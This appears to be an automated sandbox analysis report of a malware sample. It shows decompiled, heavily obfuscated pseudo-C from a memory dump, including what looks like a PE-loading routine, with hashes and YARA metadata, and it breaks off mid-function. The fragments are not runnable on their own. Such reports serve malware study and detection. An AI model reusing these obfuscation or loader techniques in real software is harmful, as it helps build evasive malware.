                                          • Instruction Fuzzy Hash: BE02617150D3818FE368CF25D54AA5BBBE2FBC4708F50891DF199862A0DBB58909CF53
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 006CE377, Relevance: 15.3, Strings: 12, Instructions: 321COMMONCrypto
                                          Download Yara Rule
                                          C-Code - Quality: 98%
                                          			E006CE377() {
				intOrPtr _t319;
				intOrPtr _t322;
				void* _t325;
				intOrPtr _t326;
				intOrPtr _t327;
				intOrPtr _t329;
				void* _t336;
				intOrPtr* _t368;
				signed int _t371;
				signed int _t372;
				signed int _t373;
				void* _t374;
				intOrPtr* _t376;
				void* _t380;

				 *(_t380 + 0x90) = 0x492ac5;
				 *(_t380 + 0x94) = 0;
				 *((intOrPtr*)(_t380 + 0x98)) = 0;
				_t336 = 0x262df760;
				 *(_t380 + 0x48) = 0xf735;
				 *(_t380 + 0x48) =  *(_t380 + 0x48) << 2;
				 *(_t380 + 0x48) =  *(_t380 + 0x48) | 0x892d06ba;
				 *(_t380 + 0x48) =  *(_t380 + 0x48) ^ 0x892fdeff;
				 *(_t380 + 4) = 0x4aa3;
				 *(_t380 + 4) =  *(_t380 + 4) >> 0xc;
				 *(_t380 + 4) =  *(_t380 + 4) | 0x950899f8;
				 *(_t380 + 4) =  *(_t380 + 4) << 4;
				 *(_t380 + 4) =  *(_t380 + 4) ^ 0x50899fc1;
				 *(_t380 + 0x34) = 0x5ec9;
				 *(_t380 + 0x8c) = 0;
				 *(_t380 + 0x44) =  *(_t380 + 0x34) * 0x1a;
				_t371 = 0x70;
				 *(_t380 + 0x48) =  *(_t380 + 0x44) * 0x3f;
				 *(_t380 + 0x48) =  *(_t380 + 0x48) ^ 0x025e429c;
				 *(_t380 + 0x60) = 0xe88e;
				 *(_t380 + 0x60) =  *(_t380 + 0x60) >> 5;
				 *(_t380 + 0x60) =  *(_t380 + 0x60) + 0xffff58a0;
				 *(_t380 + 0x60) =  *(_t380 + 0x60) ^ 0xffff02fa;
				 *(_t380 + 0x58) = 0xbd5e;
				 *(_t380 + 0x58) =  *(_t380 + 0x58) ^ 0xb084e46b;
				 *(_t380 + 0x58) =  *(_t380 + 0x58) >> 0xe;
				 *(_t380 + 0x58) =  *(_t380 + 0x58) ^ 0x0002e87c;
				 *(_t380 + 0x2c) = 0x606e;
				 *(_t380 + 0x2c) =  *(_t380 + 0x2c) + 0xffff1c2d;
				 *(_t380 + 0x2c) =  *(_t380 + 0x2c) + 0x108d;
				 *(_t380 + 0x2c) =  *(_t380 + 0x2c) * 0x15;
				 *(_t380 + 0x2c) =  *(_t380 + 0x2c) ^ 0xfff6a15c;
				 *(_t380 + 0x4c) = 0xb86a;
				 *(_t380 + 0x4c) =  *(_t380 + 0x4c) + 0xd5ca;
				 *(_t380 + 0x4c) =  *(_t380 + 0x4c) | 0x7ce26820;
				 *(_t380 + 0x4c) =  *(_t380 + 0x4c) ^ 0x7ce3b1fe;
				 *(_t380 + 0x44) = 0x5cf7;
				 *(_t380 + 0x44) =  *(_t380 + 0x44) | 0x38977032;
				 *(_t380 + 0x44) =  *(_t380 + 0x44) * 0x30;
				 *(_t380 + 0x44) =  *(_t380 + 0x44) ^ 0x9c67384b;
				 *(_t380 + 0x74) = 0xd45b;
				 *(_t380 + 0x74) =  *(_t380 + 0x74) / _t371;
				 *(_t380 + 0x74) =  *(_t380 + 0x74) ^ 0x00004dc6;
				 *(_t380 + 0x14) = 0x87c2;
				 *(_t380 + 0x14) =  *(_t380 + 0x14) + 0xc44a;
				 *(_t380 + 0x14) =  *(_t380 + 0x14) ^ 0x3473056e;
				 *(_t380 + 0x14) =  *(_t380 + 0x14) ^ 0x529657aa;
				 *(_t380 + 0x14) =  *(_t380 + 0x14) ^ 0x66e43592;
				 *(_t380 + 0x6c) = 0x3ddc;
				 *(_t380 + 0x6c) =  *(_t380 + 0x6c) >> 6;
				 *(_t380 + 0x6c) =  *(_t380 + 0x6c) ^ 0x00003a4d;
				 *(_t380 + 0x3c) = 0xc186;
				 *(_t380 + 0x3c) =  *(_t380 + 0x3c) + 0xffff2874;
				_t372 = 0x60;
				 *(_t380 + 0x38) =  *(_t380 + 0x3c) / _t372;
				 *(_t380 + 0x38) =  *(_t380 + 0x38) ^ 0x02aacd93;
				 *(_t380 + 0x94) = 0x420b;
				 *(_t380 + 0x94) =  *(_t380 + 0x94) + 0xffff81cc;
				 *(_t380 + 0x94) =  *(_t380 + 0x94) ^ 0xffffbf2e;
				 *(_t380 + 0x24) = 0x5d05;
				 *(_t380 + 0x24) =  *(_t380 + 0x24) << 7;
				 *(_t380 + 0x24) =  *(_t380 + 0x24) >> 0xf;
				 *(_t380 + 0x24) =  *(_t380 + 0x24) ^ 0x53344f8a;
				 *(_t380 + 0x24) =  *(_t380 + 0x24) ^ 0x53345d77;
				 *(_t380 + 0x78) = 0xceba;
				 *(_t380 + 0x78) =  *(_t380 + 0x78) >> 0x10;
				 *(_t380 + 0x78) =  *(_t380 + 0x78) ^ 0x00002af4;
				 *(_t380 + 0x1c) = 0x6278;
				 *(_t380 + 0x1c) =  *(_t380 + 0x1c) << 0xa;
				 *(_t380 + 0x1c) =  *(_t380 + 0x1c) ^ 0x09bc8c53;
				 *(_t380 + 0x1c) =  *(_t380 + 0x1c) + 0xd5e;
				 *(_t380 + 0x1c) =  *(_t380 + 0x1c) ^ 0x08353d86;
				 *(_t380 + 0x18) = 0x457c;
				 *(_t380 + 0x18) =  *(_t380 + 0x18) ^ 0x1123efff;
				 *(_t380 + 0x18) =  *(_t380 + 0x18) + 0x9050;
				 *(_t380 + 0x18) =  *(_t380 + 0x18) ^ 0x715c45c2;
				 *(_t380 + 0x18) =  *(_t380 + 0x18) ^ 0x607832f2;
				 *(_t380 + 0x4c) = 0x48c4;
				 *(_t380 + 0x4c) =  *(_t380 + 0x4c) + 0x892d;
				 *(_t380 + 0x4c) =  *(_t380 + 0x4c) ^ 0x18e86949;
				 *(_t380 + 0x4c) =  *(_t380 + 0x4c) ^ 0x18e8d95b;
				 *(_t380 + 0x64) = 0xb936;
				 *(_t380 + 0x64) =  *(_t380 + 0x64) + 0xd883;
				 *(_t380 + 0x64) =  *(_t380 + 0x64) ^ 0x0001ac1b;
				 *(_t380 + 0x20) = 0xcbd2;
				_t373 = 0x7c;
				 *(_t380 + 0x20) =  *(_t380 + 0x20) * 0x1d;
				 *(_t380 + 0x20) =  *(_t380 + 0x20) / _t373;
				 *(_t380 + 0x20) =  *(_t380 + 0x20) | 0xfc977955;
				 *(_t380 + 0x20) =  *(_t380 + 0x20) ^ 0xfc977dd0;
				 *(_t380 + 0x6c) = 0x94d3;
				 *(_t380 + 0x6c) =  *(_t380 + 0x6c) | 0xdadf67d0;
				 *(_t380 + 0x6c) =  *(_t380 + 0x6c) ^ 0xdadfc8fb;
				 *(_t380 + 0x90) = 0xca42;
				 *(_t380 + 0x90) =  *(_t380 + 0x90) * 0x44;
				 *(_t380 + 0x90) =  *(_t380 + 0x90) ^ 0x0035a538;
				 *(_t380 + 0x3c) = 0x3a85;
				 *(_t380 + 0x3c) =  *(_t380 + 0x3c) | 0x6827828e;
				 *(_t380 + 0x3c) =  *(_t380 + 0x3c) >> 5;
				 *(_t380 + 0x3c) =  *(_t380 + 0x3c) ^ 0x0341637e;
				 *(_t380 + 0x74) = 0xaf39;
				 *(_t380 + 0x74) =  *(_t380 + 0x74) << 0xb;
				 *(_t380 + 0x74) =  *(_t380 + 0x74) ^ 0x0579f034;
				 *(_t380 + 0x84) = 0x7bfe;
				 *(_t380 + 0x84) =  *(_t380 + 0x84) * 0x70;
				 *(_t380 + 0x84) =  *(_t380 + 0x84) ^ 0x0036086b;
				 *(_t380 + 0x88) = 0xbca6;
				 *(_t380 + 0x88) =  *(_t380 + 0x88) + 0xffffd080;
				 *(_t380 + 0x88) =  *(_t380 + 0x88) ^ 0x0000ec3f;
				 *(_t380 + 0x7c) = 0x7bcd;
				 *(_t380 + 0x7c) =  *(_t380 + 0x7c) >> 0xf;
				 *(_t380 + 0x7c) =  *(_t380 + 0x7c) ^ 0x00003bde;
				 *(_t380 + 0x8c) = 0x5f89;
				 *(_t380 + 0x8c) =  *(_t380 + 0x8c) + 0x6fee;
				 *(_t380 + 0x8c) =  *(_t380 + 0x8c) ^ 0x0000a333;
				 *(_t380 + 0x2c) = 0x86b9;
				 *(_t380 + 0x2c) =  *(_t380 + 0x2c) + 0xffffbf3c;
				 *(_t380 + 0x2c) =  *(_t380 + 0x2c) >> 5;
				 *(_t380 + 0x2c) =  *(_t380 + 0x2c) >> 4;
				 *(_t380 + 0x2c) =  *(_t380 + 0x2c) ^ 0x000073b3;
				 *(_t380 + 0x50) = 0x2126;
				 *(_t380 + 0x50) =  *(_t380 + 0x50) ^ 0x2e94f228;
				 *(_t380 + 0x50) =  *(_t380 + 0x50) >> 0xe;
				 *(_t380 + 0x50) =  *(_t380 + 0x50) ^ 0x00008d73;
				 *(_t380 + 0x80) = 0xf6ec;
				 *(_t380 + 0x80) =  *(_t380 + 0x80) * 0x34;
				 *(_t380 + 0x80) =  *(_t380 + 0x80) ^ 0x003277fb;
				 *(_t380 + 0x60) = 0x3ac6;
				 *(_t380 + 0x60) =  *(_t380 + 0x60) * 0x28;
				 *(_t380 + 0x60) =  *(_t380 + 0x60) | 0xd79c8d1c;
				 *(_t380 + 0x60) =  *(_t380 + 0x60) ^ 0xd79df08f;
				 *(_t380 + 0x30) = 0x4848;
				 *(_t380 + 0x30) =  *(_t380 + 0x30) ^ 0x9b476349;
				 *(_t380 + 0x30) =  *(_t380 + 0x30) ^ 0x919ac53c;
				 *(_t380 + 0x30) =  *(_t380 + 0x30) ^ 0x0adda027;
				 *(_t380 + 0x34) = 0xf09c;
				 *(_t380 + 0x34) =  *(_t380 + 0x34) << 0xc;
				_t374 = 0x28650a76;
				_t368 =  *((intOrPtr*)(_t380 + 0x98));
				_t334 =  *((intOrPtr*)(_t380 + 0x98));
				_t378 =  *((intOrPtr*)(_t380 + 0x98));
				 *(_t380 + 0x34) =  *(_t380 + 0x34) * 0x3e;
				 *(_t380 + 0x34) =  *(_t380 + 0x34) ^ 0xa45c8003;
				while(_t336 != 0xd3df7e1) {
					if(_t336 == 0x132cc48f) {
						E006CF536( *(_t380 + 0x34),  *(_t380 + 0x58),  *(_t380 + 0x84), _t368);
						_t336 = 0xd3df7e1;
						continue;
					}
					if(_t336 == 0x159b7bb7) {
						_push(_t336);
						_push(_t336);
						 *((intOrPtr*)(_t380 + 0xa0)) = 0x1000;
						_t368 = E006C8736(0x1000);
						__eflags = _t368;
						_t336 =  !=  ? _t374 : 0xd3df7e1;
						continue;
					}
					if(_t336 == 0x18c2a499) {
						_t319 = E006CB566(_t336,  *(_t380 + 0x44) | 0x00000006,  *(_t380 + 0x74),  *((intOrPtr*)(_t380 + 0x68)), 1,  *(_t380 + 0x90), _t336,  *((intOrPtr*)(_t380 + 0x28)),  *(_t380 + 0x7c), 0x2000000,  *(_t380 + 0x44),  *((intOrPtr*)(_t380 + 0x9c)),  *(_t380 + 0x38), _t380 + 0xb0);
						_t334 = _t319;
						_t380 = _t380 + 0x30;
						__eflags = _t319 - 0xffffffff;
						if(__eflags == 0) {
							L29:
							__eflags = 0;
							return 0;
						}
						_t336 = 0x159b7bb7;
						continue;
					}
					if(_t336 == 0x1a0fbde3) {
						E006D3E3F(_t336, _t380 + 0xb4, __eflags,  *(_t380 + 0x48),  *((intOrPtr*)(_t380 + 0x5c)));
						_t322 = E006C28CE(_t380 + 0xbc,  *(_t380 + 0x60),  *(_t380 + 0x30));
						_t378 = _t322;
						_t380 = _t380 + 0xc;
						_t336 = 0x18c2a499;
						 *((short*)(_t322 - 2)) = 0;
						continue;
					}
					if(_t336 == 0x262df760) {
						_t336 = 0x1a0fbde3;
						continue;
					}
					if(_t336 != _t374) {
						L28:
						__eflags = _t336 - 0x1c26cb40;
						if(__eflags != 0) {
							continue;
						}
						goto L29;
					}
					_t325 = E006D6319( *(_t380 + 0x44), _t334,  *((intOrPtr*)(_t380 + 0xc4)),  *(_t380 + 0x74),  *(_t380 + 0x7c),  *(_t380 + 0x84), _t368,  *(_t380 + 0x38), _t336,  *(_t380 + 0x7c), _t336, _t336,  *(_t380 + 0x94), _t380 + 0xac);
					_t380 = _t380 + 0x30;
					if(_t325 == 0) {
						_t326 =  *((intOrPtr*)(_t380 + 0x9c));
						L18:
						__eflags = _t326;
						if(__eflags == 0) {
							_t336 = _t374;
						} else {
							_t327 =  *0x6dca30; // 0x0
							E006D8A4B( *(_t380 + 0x90),  *(_t380 + 0x94),  *(_t380 + 0x84),  *((intOrPtr*)(_t327 + 8)),  *(_t380 + 0x8c));
							_t380 = _t380 + 0xc;
							_t336 = 0x132cc48f;
						}
						continue;
					}
					_t376 = _t368;
					while( *((intOrPtr*)(_t376 + 4)) != 4 || E006C8624( *(_t380 + 0x44), _t378,  *(_t380 + 0x78), _t376 + 0xc) != 0) {
						_t329 =  *_t376;
						if(_t329 == 0) {
							_t326 =  *((intOrPtr*)(_t380 + 0x9c));
							L17:
							_t374 = 0x28650a76;
							goto L18;
						}
						_t376 = _t376 + _t329;
					}
					_t326 = 1;
					 *((intOrPtr*)(_t380 + 0x9c)) = 1;
					goto L17;
				}
				E006D4F7D( *(_t380 + 0x60),  *(_t380 + 0x30), _t334);
				_t336 = 0x1c26cb40;
				goto L28;
			}

















                                          0x006ce37d
                                          0x006ce38a
                                          0x006ce393
                                          0x006ce39a
                                          0x006ce39f
                                          0x006ce3a7
                                          0x006ce3ac
                                          0x006ce3b4
                                          0x006ce3bc
                                          0x006ce3c4
                                          0x006ce3c9
                                          0x006ce3d1
                                          0x006ce3d6
                                          0x006ce3de
                                          0x006ce3e6
                                          0x006ce3f6
                                          0x006ce401
                                          0x006ce404
                                          0x006ce408
                                          0x006ce410
                                          0x006ce418
                                          0x006ce41d
                                          0x006ce425
                                          0x006ce42d
                                          0x006ce435
                                          0x006ce43d
                                          0x006ce442
                                          0x006ce44a
                                          0x006ce452
                                          0x006ce45a
                                          0x006ce467
                                          0x006ce46b
                                          0x006ce473
                                          0x006ce47b
                                          0x006ce483
                                          0x006ce48b
                                          0x006ce493
                                          0x006ce49b
                                          0x006ce4a8
                                          0x006ce4ac
                                          0x006ce4b4
                                          0x006ce4c4
                                          0x006ce4c8
                                          0x006ce4d0
                                          0x006ce4d8
                                          0x006ce4e0
                                          0x006ce4e8
                                          0x006ce4f0
                                          0x006ce4f8
                                          0x006ce500
                                          0x006ce505
                                          0x006ce50d
                                          0x006ce515
                                          0x006ce521
                                          0x006ce524
                                          0x006ce528
                                          0x006ce530
                                          0x006ce53b
                                          0x006ce546
                                          0x006ce551
                                          0x006ce559
                                          0x006ce55e
                                          0x006ce563
                                          0x006ce56b
                                          0x006ce573
                                          0x006ce57d
                                          0x006ce582
                                          0x006ce58a
                                          0x006ce592
                                          0x006ce597
                                          0x006ce59f
                                          0x006ce5a7
                                          0x006ce5af
                                          0x006ce5b7
                                          0x006ce5bf
                                          0x006ce5c7
                                          0x006ce5cf
                                          0x006ce5d7
                                          0x006ce5df
                                          0x006ce5e7
                                          0x006ce5ef
                                          0x006ce5f7
                                          0x006ce5ff
                                          0x006ce607
                                          0x006ce60f
                                          0x006ce61e
                                          0x006ce61f
                                          0x006ce629
                                          0x006ce62d
                                          0x006ce635
                                          0x006ce63d
                                          0x006ce645
                                          0x006ce64d
                                          0x006ce655
                                          0x006ce668
                                          0x006ce66f
                                          0x006ce67a
                                          0x006ce682
                                          0x006ce68a
                                          0x006ce68f
                                          0x006ce697
                                          0x006ce69f
                                          0x006ce6a4
                                          0x006ce6ac
                                          0x006ce6bf
                                          0x006ce6c6
                                          0x006ce6d1
                                          0x006ce6dc
                                          0x006ce6e7
                                          0x006ce6f2
                                          0x006ce6fa
                                          0x006ce6ff
                                          0x006ce707
                                          0x006ce712
                                          0x006ce71d
                                          0x006ce728
                                          0x006ce730
                                          0x006ce738
                                          0x006ce73d
                                          0x006ce742
                                          0x006ce74a
                                          0x006ce752
                                          0x006ce75a
                                          0x006ce75f
                                          0x006ce767
                                          0x006ce77a
                                          0x006ce781
                                          0x006ce78c
                                          0x006ce799
                                          0x006ce79d
                                          0x006ce7a5
                                          0x006ce7ad
                                          0x006ce7b5
                                          0x006ce7bd
                                          0x006ce7c5
                                          0x006ce7cd
                                          0x006ce7d5
                                          0x006ce7da
                                          0x006ce7e4
                                          0x006ce7eb
                                          0x006ce7f2
                                          0x006ce7f9
                                          0x006ce7fd
                                          0x006ce805
                                          0x006ce817
                                          0x006cea0c
                                          0x006cea13
                                          0x00000000
                                          0x006cea13
                                          0x006ce823
                                          0x006ce9d2
                                          0x006ce9d3
                                          0x006ce9d9
                                          0x006ce9ea
                                          0x006ce9ed
                                          0x006ce9f4
                                          0x00000000
                                          0x006ce9f4
                                          0x006ce82f
                                          0x006ce9a9
                                          0x006ce9ae
                                          0x006ce9b0
                                          0x006ce9b3
                                          0x006ce9b6
                                          0x006cea3d
                                          0x006cea40
                                          0x006cea49
                                          0x006cea49
                                          0x006ce9bc
                                          0x00000000
                                          0x006ce9bc
                                          0x006ce83b
                                          0x006ce93e
                                          0x006ce952
                                          0x006ce957
                                          0x006ce959
                                          0x006ce95e
                                          0x006ce963
                                          0x00000000
                                          0x006ce963
                                          0x006ce847
                                          0x006ce925
                                          0x00000000
                                          0x006ce925
                                          0x006ce84f
                                          0x006cea31
                                          0x006cea31
                                          0x006cea37
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x006cea37
                                          0x006ce88c
                                          0x006ce891
                                          0x006ce896
                                          0x006ce8cf
                                          0x006ce8e4
                                          0x006ce8e4
                                          0x006ce8e6
                                          0x006ce91e
                                          0x006ce8e8
                                          0x006ce8ef
                                          0x006ce90c
                                          0x006ce911
                                          0x006ce914
                                          0x006ce914
                                          0x00000000
                                          0x006ce8e6
                                          0x006ce898
                                          0x006ce89a
                                          0x006ce8b9
                                          0x006ce8bd
                                          0x006ce8d8
                                          0x006ce8df
                                          0x006ce8df
                                          0x00000000
                                          0x006ce8df
                                          0x006ce8bf
                                          0x006ce8bf
                                          0x006ce8c5
                                          0x006ce8c6
                                          0x00000000
                                          0x006ce8c6
                                          0x006cea26
                                          0x006cea2c
                                          0x00000000

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.2095095758.00000000006C1000.00000020.00000001.sdmp, Offset: 006C0000, based on PE: true
                                          • Associated: 00000007.00000002.2095092922.00000000006C0000.00000004.00000001.sdmp Download File
                                          • Associated: 00000007.00000002.2095106870.00000000006DC000.00000004.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID: CreateFile
                                          • String ID: h|$&!$?$HH$M:$^$n`$ve($ve($w]4S$|E$o
                                          • API String ID: 823142352-1348462970
                                          • Opcode ID: 3a3956d77012e58235b0cdf28eae770eee416c30ee9d3110ab00cfb97c865c0c
                                          • Instruction ID: 07f34188b7ff56c8ea6c4b622394870881ae40441205578570248896f52f5c2b
                                          • Opcode Fuzzy Hash: 3a3956d77012e58235b0cdf28eae770eee416c30ee9d3110ab00cfb97c865c0c
                                          • Instruction Fuzzy Hash: 73F104715093819FE368CF25C54AA6BBBF2FBC5708F10891DE1DA862A0D7B58909CF17
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 006D6DB9, Relevance: 15.2, Strings: 12, Instructions: 224COMMONCrypto
                                          Download Yara Rule
                                          C-Code - Quality: 92%
                                          			E006D6DB9(void* __ecx, void* __edi, void* __ebp, void* __eflags, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				signed int _v4;
				intOrPtr _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				void* _t224;
				void* _t243;
				void* _t256;
				void* _t264;
				void* _t288;
				signed int _t290;
				signed int _t291;
				signed int _t292;
				signed int _t293;
				signed int _t294;
				void* _t295;
				void* _t298;
				signed int* _t301;
				signed int* _t302;
				signed int* _t303;

				_push(_a20);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(0);
				_push(3);
				_push(__ecx);
				E006C602B(_t224);
				_v4 = _v4 & 0x00000000;
				_v8 = 0x15bbba;
				_v72 = 0x7e44;
				_t290 = 0x3e;
				_v72 = _v72 * 0x56;
				_v72 = _v72 | 0xe97810d5;
				_v72 = _v72 ^ 0xe97a6add;
				_v56 = 0x50ea;
				_v56 = _v56 >> 9;
				_v56 = _v56 >> 8;
				_v56 = _v56 ^ 0x00008000;
				_v100 = 0x7422;
				_v100 = _v100 + 0xffff8791;
				_v100 = _v100 ^ 0x724a15f0;
				_v100 = _v100 + 0xd05;
				_v100 = _v100 ^ 0x8db5db48;
				_v48 = 0x2edd;
				_v48 = _v48 / _t290;
				_v48 = _v48 ^ 0x00005532;
				_v76 = 0xee3f;
				_v76 = _v76 + 0xffffe6cd;
				_v76 = _v76 + 0xffff5ce1;
				_v76 = _v76 ^ 0x00006965;
				_v104 = 0xa36d;
				_v104 = _v104 << 0xc;
				_v104 = _v104 + 0x5d19;
				_v104 = _v104 >> 1;
				_v104 = _v104 ^ 0x051bebf0;
				_v52 = 0xa852;
				_v52 = _v52 + 0xddb7;
				_v52 = _v52 ^ 0x00019bba;
				_v96 = 0xa4e6;
				_v96 = _v96 | 0xa6d42a45;
				_t291 = 0x2e;
				_v96 = _v96 * 0x22;
				_v96 = _v96 << 1;
				_v96 = _v96 ^ 0x507e3c16;
				_v40 = 0x2ce2;
				_v40 = _v40 + 0xffffe435;
				_v40 = _v40 ^ 0x00002c9b;
				_v64 = 0xad5e;
				_v64 = _v64 * 0xd;
				_v64 = _v64 >> 0xf;
				_v64 = _v64 ^ 0x00006dfc;
				_v68 = 0x15e2;
				_v68 = _v68 << 4;
				_v68 = _v68 + 0x971e;
				_v68 = _v68 ^ 0x0001ffd3;
				_v28 = 0x5912;
				_v28 = _v28 | 0xb77a8e9e;
				_v28 = _v28 ^ 0xb77a927a;
				_v32 = 0xb0a1;
				_v32 = _v32 >> 6;
				_v32 = _v32 ^ 0x000014c1;
				_v36 = 0x1527;
				_v36 = _v36 / _t291;
				_v36 = _v36 ^ 0x000058cb;
				_v92 = 0x32e5;
				_v92 = _v92 * 0x31;
				_v92 = _v92 + 0xffff00ec;
				_v92 = _v92 << 8;
				_v92 = _v92 ^ 0x08be8a0d;
				_v20 = 0xbd6f;
				_v20 = _v20 + 0xab45;
				_v20 = _v20 ^ 0x000148c7;
				_v24 = 0x6d6f;
				_t292 = 0x6d;
				_v24 = _v24 / _t292;
				_v24 = _v24 ^ 0x00002132;
				_v84 = 0xac46;
				_t293 = 0x2f;
				_v84 = _v84 * 0x6c;
				_v84 = _v84 + 0xe89f;
				_v84 = _v84 >> 7;
				_v84 = _v84 ^ 0x0000aacf;
				_v88 = 0x7aeb;
				_v88 = _v88 * 0x1d;
				_v88 = _v88 >> 0xb;
				_t294 = 0x7f;
				_v88 = _v88 / _t293;
				_v88 = _v88 ^ 0x00001cd5;
				_v60 = 0x8b82;
				_v60 = _v60 + 0xffffb5bd;
				_v60 = _v60 * 0x35;
				_v60 = _v60 ^ 0x000df53e;
				_v12 = 0x733f;
				_v12 = _v12 >> 3;
				_v12 = _v12 ^ 0x000065d0;
				_v16 = 0x6f84;
				_v16 = _v16 | 0x29e4272c;
				_v16 = _v16 ^ 0x29e452e1;
				_v80 = 0x4249;
				_v80 = _v80 >> 0xb;
				_v80 = _v80 / _t294;
				_v80 = _v80 >> 3;
				_v80 = _v80 ^ 0x00004a04;
				_v44 = 0x4ba5;
				_v44 = _v44 + 0xffffabaf;
				_v44 = _v44 ^ 0xfffff714;
				_t243 = E006D3811(__ecx, _v48, _a8, _v76, _v104, _v52);
				_t256 = _t243;
				_t301 =  &(( &_v104)[0xb]);
				if(_t256 == 0) {
					return _t243;
				}
				_t295 = E006C7EC5(_v96, _v40,  *((intOrPtr*)(_t256 + 0x50)), _v64, _v68, _v44, __ecx, _v100 | _v72);
				_t302 =  &(_t301[6]);
				if(_t295 == 0) {
					L7:
					return _t295;
				}
				E006D2674(_v28, _v32,  *((intOrPtr*)(_t256 + 0x54)), _t295, _v36, _v92, _a8);
				_t303 =  &(_t302[5]);
				_t288 = ( *(_t256 + 0x14) & 0x0000ffff) + 0x18 + _t256;
				_t298 = ( *(_t256 + 6) & 0x0000ffff) * 0x28 + _t288;
				while(_t288 < _t298) {
					_t261 =  <  ?  *((void*)(_t288 + 8)) :  *((intOrPtr*)(_t288 + 0x10));
					E006D2674(_v20, _v24,  <  ?  *((void*)(_t288 + 8)) :  *((intOrPtr*)(_t288 + 0x10)),  *((intOrPtr*)(_t288 + 0xc)) + _t295, _v84, _v88,  *((intOrPtr*)(_t288 + 0x14)) + _a8);
					_t303 =  &(_t303[5]);
					_t288 = _t288 + 0x28;
				}
				E006CF7D8(_t295, _t256);
				_t264 = _t295;
				if(E006CE05A(_t264, _t256) == 0) {
					_push(_t264);
					E006D4FE8(_v56, _t295, _v60, _v12, _v16, _v80);
					_t295 = 0;
				}
				goto L7;
			}












































                                          0x006d6dbe
                                          0x006d6dc5
                                          0x006d6dcc
                                          0x006d6dd3
                                          0x006d6dda
                                          0x006d6ddc
                                          0x006d6dde
                                          0x006d6ddf
                                          0x006d6de4
                                          0x006d6dee
                                          0x006d6df9
                                          0x006d6e08
                                          0x006d6e0b
                                          0x006d6e0f
                                          0x006d6e17
                                          0x006d6e1f
                                          0x006d6e27
                                          0x006d6e2c
                                          0x006d6e31
                                          0x006d6e39
                                          0x006d6e41
                                          0x006d6e49
                                          0x006d6e51
                                          0x006d6e59
                                          0x006d6e61
                                          0x006d6e71
                                          0x006d6e75
                                          0x006d6e7d
                                          0x006d6e85
                                          0x006d6e8d
                                          0x006d6e95
                                          0x006d6e9d
                                          0x006d6ea5
                                          0x006d6eaa
                                          0x006d6eb2
                                          0x006d6eb6
                                          0x006d6ebe
                                          0x006d6ec6
                                          0x006d6ece
                                          0x006d6ed6
                                          0x006d6ede
                                          0x006d6eeb
                                          0x006d6eec
                                          0x006d6ef0
                                          0x006d6ef4
                                          0x006d6efc
                                          0x006d6f04
                                          0x006d6f0c
                                          0x006d6f14
                                          0x006d6f21
                                          0x006d6f25
                                          0x006d6f2a
                                          0x006d6f32
                                          0x006d6f3a
                                          0x006d6f3f
                                          0x006d6f47
                                          0x006d6f4f
                                          0x006d6f57
                                          0x006d6f5f
                                          0x006d6f67
                                          0x006d6f6f
                                          0x006d6f74
                                          0x006d6f7c
                                          0x006d6f8a
                                          0x006d6f8e
                                          0x006d6f96
                                          0x006d6fa3
                                          0x006d6fa7
                                          0x006d6fb1
                                          0x006d6fb6
                                          0x006d6fbe
                                          0x006d6fc6
                                          0x006d6fce
                                          0x006d6fd6
                                          0x006d6fe4
                                          0x006d6fe9
                                          0x006d6fef
                                          0x006d6ff7
                                          0x006d7004
                                          0x006d7007
                                          0x006d700b
                                          0x006d7013
                                          0x006d7018
                                          0x006d7020
                                          0x006d702d
                                          0x006d7031
                                          0x006d703c
                                          0x006d703d
                                          0x006d7043
                                          0x006d704b
                                          0x006d7053
                                          0x006d7060
                                          0x006d7064
                                          0x006d706c
                                          0x006d7077
                                          0x006d707f
                                          0x006d708a
                                          0x006d7092
                                          0x006d709a
                                          0x006d70a2
                                          0x006d70aa
                                          0x006d70b5
                                          0x006d70b9
                                          0x006d70be
                                          0x006d70c6
                                          0x006d70ce
                                          0x006d70d6
                                          0x006d70f5
                                          0x006d70fa
                                          0x006d70fc
                                          0x006d7101
                                          0x006d71ee
                                          0x006d71ee
                                          0x006d712d
                                          0x006d712f
                                          0x006d7134
                                          0x006d71e7
                                          0x00000000
                                          0x006d71e7
                                          0x006d7157
                                          0x006d7160
                                          0x006d716d
                                          0x006d716f
                                          0x006d71aa
                                          0x006d718d
                                          0x006d719f
                                          0x006d71a4
                                          0x006d71a7
                                          0x006d71a7
                                          0x006d71b2
                                          0x006d71b9
                                          0x006d71c4
                                          0x006d71c6
                                          0x006d71dd
                                          0x006d71e5
                                          0x006d71e5
                                          0x00000000

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.2095095758.00000000006C1000.00000020.00000001.sdmp, Offset: 006C0000, based on PE: true
                                          • Associated: 00000007.00000002.2095092922.00000000006C0000.00000004.00000001.sdmp Download File
                                          • Associated: 00000007.00000002.2095106870.00000000006DC000.00000004.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID: "t$2!$2U$?s$IB$ei$om$,$2$P$R)$z
                                          • API String ID: 0-3377435326
                                          • Opcode ID: 3d0207934d40abbc6c7b225edab598dbb3739286f739d077276c6eaf293611b6
                                          • Instruction ID: 650ce94bc2e34677ef0a57f6795daaa0c1465be0433a2a5aacc856e69c737990
                                          • Opcode Fuzzy Hash: 3d0207934d40abbc6c7b225edab598dbb3739286f739d077276c6eaf293611b6
                                          • Instruction Fuzzy Hash: 0DB112719087809FE364CF25C88A94BFBF2BBC4358F508A1DF695862A0D7B9C559CF42
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 006C6D9F, Relevance: 14.1, Strings: 11, Instructions: 340COMMONCrypto
                                          Download Yara Rule
                                          C-Code - Quality: 96%
                                          			E006C6D9F() {
				char _v520;
				char _v1040;
				signed int _v1044;
				intOrPtr _v1048;
				char _v1052;
				signed int _v1056;
